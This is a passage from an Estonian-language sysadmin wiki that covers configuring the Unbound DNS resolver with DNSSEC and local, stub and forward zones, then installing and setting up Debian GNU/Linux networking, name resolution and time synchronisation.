;; SERVER: 10.192.0.53#53(10.192.0.53)
;; WHEN: Sat Apr 2 18:44:16 2011
;; MSG SIZE rcvd: 397

kus tuleb tähele panna

* vastus sisaldab RRSIG kirjet
* flags: qr rd ra ad - ad tähistab, et tegu on authoritative data sisaldusega

====DLV====

DLV seadistamiseks tuleb

* kopeerida trust anchor fail kataloogi /var/unbound/etc

# cd /var/unbound/etc
# ftp http://ftp.isc.org/www/dlv/dlv.isc.org.key

* Unbound seadistusfailis kasutada rida

dlv-anchor-file: "dlv.isc.org.key

Valideeritud nimepäringu vastus näeb välja nt selline

$ dig www.kaminskybug.se a +dnssec +multiline

; <<>> DiG 9.5.1-P3 <<>> www.kaminskybug.se a +dnssec +multiline
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56069
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.kaminskybug.se. IN A

;; ANSWER SECTION:
www.kaminskybug.se. 3590 IN CNAME fou.iis.se.
www.kaminskybug.se. 3590 IN RRSIG CNAME 5 3 3600 20100205210001 (
20100126210001 13358 kaminskybug.se.
goEav1vWK49WEvGY/G1EBKOgekQk11JvjsQxE7chH6Kg
OwZNpOXwomE1z9zvLcwkD60CQAZWC9psA1z01iIwtOrt
Yq6L+2A0PLVAAuRYeY3CQnbHoHRYClCUz0dIkxhtz9f/
Um1AuC3FtqV6t9q8lLb4ooav0Ex64KuwoPPxqqs= )
fou.iis.se. 3590 IN A 212.247.204.242
fou.iis.se. 3590 IN RRSIG A 5 3 3600 20100209131501 (
20100130131501 56315 iis.se.
BOPpSETDBKu6CjOcz2ULnOnfRVoXfOXj9OjW4zwjPuWl
7vJ8630yXsuSEe89RuH/ZsuOGbeJnumQ/XmD6ftWL9yM
MPUF1ZYxCtExaBcIxhxDIFJv4E4RZAOkbb9ZdYKTglIL
zDleOOms0iVgCAnnWJSnmDpzhfvr8xoTGlh7myE= )

;; AUTHORITY SECTION:
iis.se. 3590 IN NS ns.nic.se.
iis.se. 3590 IN NS ns3.nic.se.
iis.se. 3590 IN NS ns2.nic.se.
iis.se. 3590 IN RRSIG NS 5 2 3600 20100209131501 (
20100130131501 56315 iis.se.
B3SheLIv8ouVPpFGjvM8q5fl9ZMnnPWR8x9QDD0uSxoH
iV2fYHjiKC5a2+8Znsi4zSdO2AmH+reUCP74qvYpkl1K
+NbEzndzzrJQ0XlT1icy3MC6vdvgdE7Opqjab/7iIiYV
X9UjZpHKR284EljSrKJ0z53/T+12P3K0VU/dRFE= )

;; Query time: 1 msec
;; SERVER: 10.53.67.69#53(10.53.67.69)
;; WHEN: Sun Jan 31 00:25:39 2010
;; MSG SIZE rcvd: 648

kus ad lipp annab tunnistust, et vastus on valideeritud

flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

====Firefox DNSSEC lisa kasutamine====

Firefox DNSSEC lisa https://addons.mozilla.org/en-us/firefox/addon/dnssec-validator/ abil saab brauseri kasutamise ajal tagasisidet kuidas käesolev nimi on lahendatud, nt

[[Pilt:Unbound-1.gif]]

Seejuures tuleb arvestada, et DNSSEC iseenest tähendab, et nimi lahendes turvaliselt, järgneva andmevahetuse turvalisus on eraldi küsimus ja nt https:// on üks viis selle saavutamiseks.

===domain-insecure tsoonid===

Kui kasutatakse signeeritud tsoonifailiga juurnimeservereid ning mõnele lokaalsele mitte-dnssec nimeserverile viitavaid stub-zone sissekandeid, siis võib olla asjakohane kasutada lisaks ridu

domain-insecure: "auul"
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

===Lokaalsed nimekirjeldused===

Lisaks sellele, et Unboundi kasutab nimede lahendamisel võrgus töötavaid autoriteetseid nimeservereid, saab kirjeldada seadistusfailis päri- ja pöördteisendusi

local-zone: "loomaaed.tartu.ee" static
local-data: "loomaaed.tartu.ee A 192.168.10.100"
..
local-data-ptr: "192.168.10.100 loomaaed.tartu.ee"

kus

* local-zone - lokaalselt unboundis kirjeldatud tsooni nimi
* static - sellel positsioonil st type parameeter määrab põhiliselt, kuidas mitte kirjeldatud nime küsimisele vastatakse
* local-data - päriteisendus
* local-data-prt - pöördteisendus

type väärtused

* static - local-data abil mitte kirjeldatud nime küsimisele vastatakse NXDOMAIN
* nodefault - AS112 tsoonide puhul vastab Unbound vaikimisi NXDOMAIN vastusega, nodefault puhul püütakse vastavaid nimesid lahendada
* transparent - local-data abil mitte kirjeldatud nimi püütakse lahenada internetist, stub-zone abil vms viisil
* redirect - kõik alamdomeenid vastatakse local-data abil näidatud väärtusega

===Stub tsoon===

Stub tsooni abil saab öelda, millist pädevat nimeserverit kasutada mõne domeeni nimelahenduseks. Praktiliselt võiks seda vaja minna kui asutuses on nt kasutusel mitte-avalik pädev nimeserver ja domeeni 'auul.' nimede lahendamiseks tuleks kasutada seda; vastasel korral püüaks Unbound neid nimesid lahendada pöördudes interneti juurnimeserverite poole.

Seadistusfailis kirjeldatakse stub tsoon selliselt

stub-zone:
name: "auul"
stub-addr: 192.168.1.251

kus

* name - domeeni nimi
* stub-addr - domeeni pädeva nimeserveri ip aadress
* stub sõna viitab asjaolule, et Unbound saab näidatud nimeserverilt otse vastuse kätte

Kui stub-zone abil on vaja teha mõne privaatsete aadressidega /24 subneti jaoks pöördteisendusi, siis tuleb tõenäoliselt kasutada koostöös selliseid direktiive

..
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

local-zone: "1.168.192.in-addr.arpa." transparent
local-zone: "2.168.192.in-addr.arpa." transparent
....

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

stub-zone:
name: "10.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

Oluline on panna tähele, et korrektsel juhul lahendatakse kirjeldatud tsoonid stub-addr nimeserveri poolt, muud privaatsed aadressid saavad vastuseks (vastuse genereerib Unbound ise)

$ dig -x 192.168.5.5
..
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1480
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800

Kui vastus on, siis midagi on valesti, sest Unbound on seda käinud internetis lahendamas

..
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 86400 IN SOA prisoner.iana.org. hostmaster.trex.fi. 1 604800 86400 2419200 86400

===Forward tsoon===

Forward tsooni abil saab öelda, millist rekursiivset nimeserverit kasutada mõne domeeni nimelahenduseks. Seadistusfailis kirjeldatakse forward tsoon selliselt

forward-zone:
name: "loomla.tartu.ee"
forward-addr: 10.172.20.10

kus

* name - domeeninimi
* forward-addr - rekursiivse nimeserveri aadress

Selleks, et suunata kõik päringud lahendamiseks edasi sobib kasutada

forward-zone:
name: "."
forward-addr: 10.172.20.10

===AS112 tsoonid===

AS112 tsoonide hulka kuuluvad sellised pöördteisenduse tsoonid, vaikimisi vastab AS112 tsooni tehtud päringutele Unbound NXDOMAIN (põhjusel, et sisemiste arvutite poolt tehtud pöördteisenduspäringud ei jõuaks avalikku võrku)

* 10.in-addr.arpa
* 16.172.in-addr.arpa
* ...
* 31.172.in-addr.arpa
* 168.192.in-addr.arpa
* 254.169.in-addr.arpa
* 2.0.192.in-addr.arpa
* 100.51.198.in-addr.arpa
* 113.0.203.in-addr.arpa

Lisaks lahendab Unbound vaikimisi mõlemas suunas localhost - 127.0.0.1 teisendust justkui oleks kirjeldatud (sarnaselt on kirjeldatud ka IPv6 ::1)

local-zone: "localhost." static
local-data: "localhost. 10800 IN NS localhost."
local-data: "localhost. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "localhost. 10800 IN A 127.0.0.1"
local-data: "localhost. 10800 IN AAAA ::1
..

local-zone: "127.in-addr.arpa." static
local-data: "127.in-addr.arpa. 10800 IN NS localhost."
local-data: "127.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "1.0.0.127.in-addr.arpa. 10800 IN PTR localhost."

Selleks, et asutuse lokaalses autoriteetses nimeserveris kirjeldatud privaatsete aadresside pöördteisendused töötaksid tuleb kirjeldada vastava tsooni jaoks local-zone väärtusega nodefault

server:
...
local-zone: "168.192.in-addr.arpa." nodefault

ning nt 192.168.1 võrgu puhul näidata pädeva nimeserveri aadress

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.251

===Jõudlus===

* Unbound oskab kasutada mitut protsessorit ja nö keskpärasel riistvaral suudab teenidada kümneid tuhandeid päringuid sekundis.
* Unbound on 2-3 korda kiirem kui Bind.

===Klientprogrammi unbound-host kasutamine===

Klientprogramm unbound-host võimaldab nt kontrollida, kas nimelahenduse valideerimine töötab

# unbound-host -C unbound.conf -t A -v www.kaminskybug.se
[1264938168] libunbound[2566:0] notice: init module 0: validator
[1264938168] libunbound[2566:0] notice: init module 1: iterator
www.kaminskybug.se is an alias for fou.iis.se. (secure)
fou.iis.se has address 212.247.204.242 (secure)

===Haldusprogramm unbound-control===

Haldusprogrammiga unbound-control saab juhtida Unbound resolveri tööd ja küsida statistikat. Kuna unbound-control võimaldab resolveri töötamist oluliselt mõjutada, nt laadida cache sisu tekstifailist või resolveri seisata, siis peab hoolega jälgima, et unbound-control kasutamisele oleks seatud vajalikud piirangud.

====Unbound resolveri ettevalmistamine====

unbound-control suhtleb Unbound serveriga vaikimisi üle 953/tcp pordi. Osaliste autentimiseks kasutatakse avaliku-võtme tehnikat, vajalike võtmete genereerimiseks sobib kasutada unbound-control-setup utiliiti

# unbound-control-setup
...
Signature ok
subject=/CN=unbound-control
Getting CA Private Key
Setup success. Certificates created. Enable in unbound.conf file to use

Tulemusena tekivad /var/unbound/etc kataloogi neli võtit, kask serveri ja kaks kliendi jaoks

unbound_control.key
unbound_control.pem
unbound_server.key
unbound_server.pem

unbound-control kasutamiseks tuleb vastav funktsionaalsus Unbound serveris sisse lülitada nt sektsiooniga

remote-control:
control-enable: yes
control-interface: 127.0.0.1

====unbound-control kasutamine====

Vaikimisi kasutab unbound-control Unbound serveri seadistusfaili, nt sobib alustuseks kasutada unbound serverit ja unbound-control utiliiti samas arvutis.

* Unbound resolveri oleku küsimine

# unbound-control status
version: 1.3.0
verbosity: 1
threads: 1
modules: 2 [ validator iterator ]
uptime: 1184 seconds
unbound (pid 23298) is running...

* Resolveri cacheist tsooni loomaaed.tartu.ee andmete kustutamine

# unbound-control flush_zone loomaaed.tartu.ee
ok removed 3 rrsets, 2 messages and 0 key entries

* Cache sisu esitamine

# unbound-control dump_cache

====Resolveri kasutusstatistika====

Üks unbound-control kasutusjuht on koguda resolveri kasutusstatistikat

# unbound-control stats_noreset

Praktiliselt on seda sobiv automatiseerida Munin või Cacti tarkvaraga, mida on kirjeldatud aadressil http://www.unbound.net/documentation/howto_statistics.html.

===Unbound ja NSD protsessid samas arvutis===

Unbound seadistusfailis sobib kasutada ridu

domain-insecure: "loomaaed.tartu.ee"
domain-insecure: "loomaaed.tartu.eu"
domain-insecure: "loomaaed.tartu.org"
...
stub-zone:
name: "loomaaed.tartu.ee"
stub-addr: 10.193.0.53

stub-zone:
name: "loomaaed.tartu.eu"
stub-addr: 10.193.0.53

stub-zone:
name: "loomaaed.tartu.org"
stub-addr: 10.193.0.53

===IPv6 kasutamine===

IPv6 kasutamiseks tuleb seadistusfailis näidata, millisel IPv6 aadressil protsess kuulab

interface: 2001:1530:90:11:192::53

ning lubada asjakohastest võrkudest teenuse poole pöörduda, nt

access-control: fd99::/64 allow

Lisaks tuleb arvestada seda, et nimepäringute lahendamiseks kasutab Unbound ise IPv4 ja IPv6 võrku.

===2026 kevad märkused===

Takerdub

<pre>
# apt-get install unbound
root@arv:~# apt-get install unbound
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound-anchor
The following NEW packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound unbound-anchor
0 upgraded, 5 newly installed, 0 to remove and 49 not upgraded.
...

Setting up unbound (1.6.7-1ubuntu2.6+esm4) ...
Created symlink /etc/systemd/system/multi-user.target.wants/unbound.service → /lib/systemd/system/unbound.service.
Created symlink /etc/systemd/system/unbound.service.wants/unbound-resolvconf.service → /lib/systemd/system/unbound-resolvconf.service.
Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.

Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.
invoke-rc.d: initscript unbound, action "start" failed.
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (auto-restart) (Result: exit-code) since Tue 2026-06-16 11:21:17 EEST; 9ms ago
Docs: man:unbound(8)
Process: 5650 ExecStart=/usr/sbin/unbound -d $DAEMON_OPTS (code=exited, status=1/FAILURE)
Process: 5304 ExecStartPre=/usr/lib/unbound/package-helper root_trust_anchor_update (code=exited, status=0/SUCCESS)
Process: 5301 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Main PID: 5650 (code=exited, status=1/FAILURE)
Processing triggers for libc-bin (2.27-3ubuntu1.6+esm6) ...
Processing triggers for systemd (237-3ubuntu10.57+esm3) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...

root 5304 0.0 0.0 4636 896 ? Ss 11:20 0:00 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
unbound 5307 0.0 0.0 34596 7820 ? S 11:20 0:00 \_ /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v
</pre>

ning

<pre>
root@arv:~# systemctl status unbound
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (start-pre) since Tue 2026-06-16 11:33:15 EEST; 38s ago
Docs: man:unbound(8)
Process: 12287 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Cntrl PID: 12290 (package-helper)
Tasks: 2 (limit: 4915)
CGroup: /system.slice/unbound.service
├─12290 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
└─12293 /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v

Jun 16 11:33:15 arv.auul.pri.ee systemd[1]: Starting Unbound DNS server...
</pre>

lahenduse koht

<pre>
root@arv:~# head -n 10 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.

root@arv:~# head -n 20 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.
RESOLVCONF="true"
ROOT_TRUST_ANCHOR_UPDATE="true"

if [ -f /etc/default/unbound ]; then
. /etc/default/unbound

case "x$RESOLVCONF" in xfalse|x0|xno)
RESOLVCONF="false"
;;
esac
</pre>

===Kasulikud lisamaterjalid===

* http://unbound.net/
* http://unbound.nlnetlabs.nl/pipermail/unbound-users/
* http://www.howtoforge.com/installing-using-unbound-nameserver-on-debian-etch
* http://www.nlnetlabs.nl/publications/dnssec_howto/index.html
* http://secspider.cs.ucla.edu/islands.html
* https://itar.iana.org/
* https://ns.iana.org/dnssec/status.html
* https://dlv.isc.org/
* http://en.wikipedia.org/wiki/AS112
* [[:Pädeva nimeserveri NSD kasutamine]]

Operatsioonisüsteemi Debian GNU/Linux kasutamine

2026-06-16T08:13:59Z

Imre: /* Kasulikud lisamaterjalid */

===Debian GNU/Linux===

Debian GNU/Linux ehk lühidalt Debian on vaba operatsioonisüsteem, mis kasutab Linux või FreeBSD tuuma ning töötab paljudel populaarsetel riistvaralistel platvormidel, sealhulgas 32 bit ja 64 bit x86 arvutid.

Debiani sobib kasutada nii serveritel kui ka töökohaarvutitel sh süleritel. Debianile on iseloomulik

* korrektselt ilmuvad turvaparandused (teated ilmuvad ka bugtraqis)
* eeskujulik paketihaldus, sh automaatne pakettide autentsuse valideerimine kontrollsummade abil (MD5sum, SHA1, SHA256)
* rahulik stabiilsete versioonide ilmumise tsükkel, erinevalt närvilisest ja suhteliselt pikk tugi eelmisele stabiisele versioonile
* väärikas kasutajaskond (ingl. k. community)
* tarkvara jagatakse kompileeritud ja lähtetekstipakettide kujul

Debiani kodulehe http://www.debian.org/ tiitel ütleb, et tegemist on universaalse operatsioonisüsteemiga, mille tunnistuseks on ehk tõepoolest asjaolu, et Debiani on kasutatud mitmete teiste nn Linuxi distributsioonide aluseks.

Debian on loodud Ian Murdock'i poolt aastal 1993, kusjuures operatsioonisüsteemi nimi on tuletatud autori ja tema abikaasa Debra eesnimedest.

===Operatsioonisüsteemi paigaldamise ettevalmistamine===

Debiani kasutamiseks on vajalik sobiv riistvara, näiteks tõenäoliselt praktiliselt suvaline 32 bit või 64 bit x86 arvuti sobib, alatest 486 PC mudelitest kuni HP DL 585 G5 ja IBM x3250 taoliste serveriteni. Riistvara sobivuse määrab põhiliselt operatsioonisüsteemi tuum, 2013 aastal on stabiilsel Debiani versioonil 7.0 selleks Linux tuuma versioon 3.2.0.

Lisaks tuleks enne operatsioonisüsteemi paigaldamist otsutada, mida arvutiga teha soovitakse, sh võiks kujutada ette milline saab olema

* arvuti nimi ja ip aadress
* kõvaketaste kasutus
* kas arvutit kasutatakse serveri või töökohana
* kuhu arvuti füüsiliselt paigutatakse
* kes vastutab arvuti haldamise eest (tarkvara uuendamine, süsteemi monitoorimine ja varundus/taaste)

Üks otsekohene moodus operatsioonisüsteemi paigladmiseks on kasutada Debiani peeglites (ingl. k. mirror) jagatavat CD tõmmisest valmistatud bootivat CD plaati, kuna kõige populaarsem platvorm on x86, siis märgime, et

* 64 bit AMD ja Inteli arvutitel kasutamiseks sobib Debiani amd64 arhitektuur
* 32 bit AMD ja Inteli arvutitel kasutamiseks sobib Debaini i386 arhitektuur

Kuivõrd reeglina AMD ja Inteli 64 bit arvutid on 32 bit-ühilduvad, siis kasutades 32 bit operatsioonisüsteemi tarkvara 64 bit riistvaral käitub arvuti nagu 32 bitine arvuti. Kuigi eelpool on mainitud nimeliselt AMD ja Intelit kehtib öeldu ka teiste tootjate x86 platvormide kohta. Järgnevas on näited toodud konkreetsuse huvides 64 bit keskkonna kohta, kuid põhimõtteliselt toimub tegevus samamoodi ka 32 bit keskkonnas toimetades. Lisaks saab valida mitmete nö eriotstarbeliste tuumade hulgast, nt i386 non-pae, tuuma nimes kasutatakse '486' sel juhul.

Niisiis, kui kasutada on 64 bit x86 riistvara tuleks kopeerida esimene amd64 arhitektuuri CD tõmmis, näiteks aadressilt http://cdimage.debian.org/debian-cd/7.0.0/amd64/iso-cd/debian-7.0.0-amd64-CD-1.iso ning kirjutada CD plaadile. Plaadi kirjutamisel peab jälgima, et tõmmist ei kirjutata plaadile mitte nagu suurt faili, vaid kirjutatakse tõmmisena, vastasel korral arvuti ei boodi sellelt plaadilt. Debian v. 7.0 on rangelt eristatud vabad ja suletud koodiga draiverid, kõige nähtavamalt mõjutab see tõenäoliselt operatsioonisüsteemi paigaldamise protseduur kui on tegemist vastava riistvaraga, http://www.debian.org/releases/stable/amd64/ch06s04.html.en.

USB pulgalt paigaldades tundub, et uuemal ajal on .iso tõmmised nii ettevalmistatud (isohybrid techniques), et need saab lihtsalt dd programmiga kopeerida pulgale ja töötab, https://wiki.debian.org/BootUsb

# dd if=/tmp/debian-7.0.0-amd64-CD-1.iso of=/dev/sdc bs=4M

Kui Debian paigaldatakse arvutile, kus juba on operatsioonisüsteem installeritud, nt Win7, siis tõenäoliselt õnnestub installeriga töötamise ajal Win7 failisüsteemide ja partitsioonide suurusi kahandada, tehes nii ruumi Debiani jaoks. Selleks tuleb kõvaketta seadistamise menüüvalikus öelda 'Manual' ja sealt edasi. Kirjanduse põhjal saab öelda, et vastvaid NTFS failisüsteeme ei ole tarvis eelnevalt defragmenteerida.

Windows operatsioonisüsteemi all sobib USB pulk tekitada UUI (Universal USB Installer) programmiga, mille kasutamise juhised leiab aadressilt http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/.

===Operatsioonisüsteemi paigaldamine===

Tuleb arvestada, et operatsioonisüsteemi paigaldamisel hävivad eelnevalt kõvaketastel olnud andmed. Peale paigaldusmeedialt arvuti käivitamist käivitatakse automaatselt operatsioonisüsteemi installer, mis näeb tekstrežiimis välja selline (alternatiivina esineb installeri kasutajaliides ka graafilises vormis)

[[Pilt:Debian-installer-v7.gif]]

Installeri kasutamine on intuatiivne, paigaldamise tulemusena tekib iseseisvalt bootiv arvuti. Paigaldamise käigus sooritatakse järgmised otsustused ja tegevused

* kõvaketakste kasutamine
* võrguseadistused
* tarkvarakomplekti valik (standard, töökoht, server)
* juurkasutaja parool
* paigaldatakse alglaadur (ingl. k. bootloader) GRUB

Peale paigaldamist saab arvutisse konsoolilt sisse logida ja teatatakse midagi sellist

Linux loomaaed 2.6.26-2-xen-686 #1 SMP Wed May 16 23:50:09 UTC 2009 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 29 23:06:53 2009 from aix.auul
mart@loomaaed:~$

Oluline on tähale panna, et muu hulgas räägib Debian oma kasutustingimustest

* Debian GNU/Linux süsteemis sisalduv tarkvara on vaba tarkvara
* Debian GNU/Linux süsteemil kasutamisega ei kaasne garantiid

Paigaldamise lõpus küsitakse, kas on soov osaleda nn populaarsus-võistluses, kord nädalas hakkab arvuti saatma paigaldatud pakettide nimekirja arendajatele, tulemused avaldadakse aadressil http://popcon.debian.org/.

===Operatsioonisüsteemi paigaldamine üle serial konsooli===

Serial konsooli eksitab splash, sellest saab lahti vajutades Esc. Seejärel tuleb sisestada

boot: install console=ttyS0,9600

===Community===

Debian GNU/Linux osas suhtlemiseks või niisama tutvumiseks saab kasutada selliseid ressursse

* Veebikoht - http://www.debian.org/
* Wiki - http://wiki.debian.org/
* Postiloendid asuvad aadressil http://lists.debian.org/
* Uudised - http://www.debian.org/News/project/
* Turvaparandusi puudutavad teadaanded - http://www.debian.org/security/

===Operatsioonisüsteemi varundamine ja taaste===

Operatsioonisüsteemi varundamiseks sobib kasutada programmi rsync kopeerides kogu failisüsteemi va kataloogid

* /tmp
* /proc
* /sys

teisele arvutile.

Süsteemi taastamiseks tuleb arvuti bootida nt RIP-Linuxi CD plaadilt, seadistada võrk, kopeerida varundatud süsteem ja paigaldada bootloader.

===IP aadress===

Staatilise IP aadressi saab Debianile seadistada failist

/etc/network/interfaces

Tüüpiliselt võiks see välja näna järgnev

# The loopback interface
auto lo
iface lo inet loopback

# The first network card - this entry was created during the Debian installation
# (network, broadcast and gateway are optional)
auto eth0

iface eth0 inet static
address 192.168.1.10
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

===Arvuti nimi ja resolver===

Arvutil peab oleme korrektselt seadistatud nimi ning nimesüsteemi kasutamine. Arvuti nimi on kirjas failis /etc/hostname, näiteks

bassein

ning failis /etc/hosts on kirjas nö staatiline nimelahendus, mis töötab päri-ja pöördteisenduse jaoks, lihtsal juhul on seal sellised read (kusjuures esimest rida tuleb kasutada sõna-sõnalt)

127.0.0.1 localhost.localdomain localhost
192.168.1.20 bassein.loomaaed.tartu.ee bassein

Peale nende failide sisu muutmist tuleb muudatuste kehtestamiseks öelda

bash# hostname bassein

Õnnestunud muudatuse kinnituseks ütleb arvuti nii

bash# hostname
bassein
bash# hostname -f
bassein.loomaaed.tartu.ee

Selleks, et arvuti lahendaks muid nimesid, peab olema kirjas nimeserveri aadress failis /etc/resolv.conf

nameserver 192.168.1.254

Kusjuures, kui failis /etc/resolv.conf kasutada mitut sellist rida erinevate nimeserverite aadressidega, siis proovitakse igal nimelahendusel neid järjest läbi kuni jõutakse esimese töötavani. Vaikimisi oodatakse vastust 5 sekundit. Täiendavat infot saab resolveri manuaalist öeldes

# man resolver

Tihtipeale kasutatakse keskkonnamuutujat PS1 prompti kujundamiseks ja mille väärtuse moodustamisel kasutatakse omakorda käsku hostname. Seetõttu muutub promptis oleva arvuti nime väärtus peale välja ja uuesti sisselogimist.

====resolvconf====

Lenny sisaldab lisaks nö staatilisele resolverile dünaamilist resolvconf tarkvara, asjakohane allikas on aadressil http://wiki.debian.org/NetworkConfiguration

Tarkvara paigaldamiseks tuleb öelda

# apt-get install resolvconf

Osa olulisi faile asub kataloogis

/etc/resolvconf

resolvconf oskab /etc/network/interfaces failist kasutada dns-nameservers parameetrit, nt selliselt

...
auto eth0
iface eth0 inet static
address 192.168.10.199
gateway 192.168.10.254
netmask 255.255.255.0
broadcast 192.168.10.255
dns-nameservers 192.168.10.254

===Kellaaeg===

Arvuti kellaaeg on korrektselt juhul kohalik aeg. See sõltub ajavööndi seadistusest, mis võiks Eestis olla

# ls -l /etc/localtime
lrwxrwxrwx 1 root root 34 Jul 15 21:40 /etc/localtime -> /usr/share/zoneinfo/Europe/Tallinn

Vajadusel tuleks eemaldada /etc/locatime ja öelda

# ln -s /usr/share/zoneinfo/Europe/Tallinn /etc/localtime

Seadistamiseks sobib kusjuures kasutada pigem ehk utiliiti dpkg-reconfigure öeldes

# dpkg-reconfigure tzdata

====Kellaaja esitamine ja seadistamine programmiga date====

Töötava süsteemi käest saab küsida aega öeldes

$ date
Sat Jan 8 14:07:25 EET 2011

Lisaks saab küsida nt nö kaks nädalat tagasi, sellest on vahel kasu nt varundamisega seotud skriptides

$ date -d "2 weeks ago"
Sat Dec 25 14:07:25 EET 2010

====Kellaaja esitamine ja seadistamine programmiga rdate====

Openrdate http://sourceforge.net/apps/mediawiki/openrdate on OpenBSD projekti rdate tarkvara port Linuxile. Tarkvara paigaldamiseks tuleb öelda

# apt-get install rdate

Kellaja ühekordne seadmine toimub öeldes

# rdate ajaserver.loomaaed.tartu.ee

rdate võimaldab suhelda kahte tüüpi ajaserveritega

* http://tools.ietf.org/html/rfc868 server - tavaliselt töötab inetd abil ja teenindab portidel 37/tcp või 37/udp
* http://tools.ietf.org/html/rfc2030 - tavaliselt töötab pordil 123/udp

rdate võtmetega saab juhtida, millist režiimi klient parasjagu kasutab, nt

$ rdate -4 -p -n ntp.ut.ee
Sat Jan 8 14:09:44 EET 2011

kus

* -4 - IPv4 protokoll
* -p - ainult küsida aega ja mitte seadistada
* -n kasutada rfc2030 ajaserverit

Vaikimisi pöördub rdate ajaserveri poole kasutades rfc686 protokolli ja 37/tcp porti.

====Kellaaja esitamine ja seadistamine programmiga ntpdate====

Tarkvara paigaldamiseks tuleb öelda

# apt-get install ntpdate

ntpdate sobib kellaaja küsimiseks rfc2060 protokolli toetavalt serverilt (kasutades 123/udp porti) ning kohaliku süsteemi kellaaja seadmiseks. Ainult kellaaja küsimiseks sobib kasutada võtit -q

$ ntpdate -p 2 -q ntp.ut.ee ntp.aso.ee
server 2001:bb8:2002:500:211:25ff:fe8f:7d64, stratum 2, offset 0.011371, delay 0.10133
server 193.40.5.113, stratum 2, offset 0.000782, delay 0.03786
server 195.80.105.226, stratum 1, offset 0.000217, delay 0.03523
8 Jan 15:35:55 ntpdate[20870]: adjust time server 195.80.105.226 offset 0.000217 sec

kus

* -p 2 - igalt toodud ajaserverilt küsitakse aega kaks korda
* -q - aega ainult küsitakse ja ei seadistata
* vastust küsitakse kolmelt ajaserverilt kuna ntp.ut.ee nimel on A ja AAAA kirjed

Algupärane ntpdate programm ise ei kasuta ühtegi seadistusfaili, kuid Debian keskkonnas on lisaks programm ntpdate-debian, mida juhib seadistusfail /etc/default/ntpdate mille abil saab juhtida, milliseid ajaservereid kasutatakse. Vaikimisi on seadistatud rida

NTPDATE_USE_NTP_CONF=yes

mis tähendab, et kasutatakse ajaservereid ntp paketi tarkvara seadistusfailist /etc/ntp.conf. Kui ntpd programm töötab, siis ntpdate keeldub aega seadmast.

====Kellaaja esitamine ja seadistamine tarkvaraga ntp====

Kellaaja sünkronisseerimiseks sobib kasutada paketti ntp

# apt-get install ntp

NTP tarkvara juhivad kaks seadistusfaili

* /etc/default/ntp - milles sisaldub vaikimisi rida ja mis tähendab, et ntpd programmi käivitamisel seadistatakse kellaaeg nö kiiresti

NTPD_OPTS='-g'

* /etc/ntp.conf - seadistusfail, kus näidatakse ajaserverid jms parameetrid

Seadistusfailist /etc/ntp.conf tuleb leida read

server 0.debian.pool.ntp.org
server 1.debian.pool.ntp.org
server 2.debian.pool.ntp.org
server 3.debian.pool.ntp.org

ning soovi korral asendada need oma teenese pakkuja nime kasutava ühe reaga, nt

server ajaserver.loomaaed.tartu.ee

Kulub mõni aega, nt 10 minutit kuni ntp töötamine stabiliseerub, sellest annab tunnistust, et ntptrace vastab kus arvuti asub ntp hierarhias, nt midagi sellist

# ntptrace -n
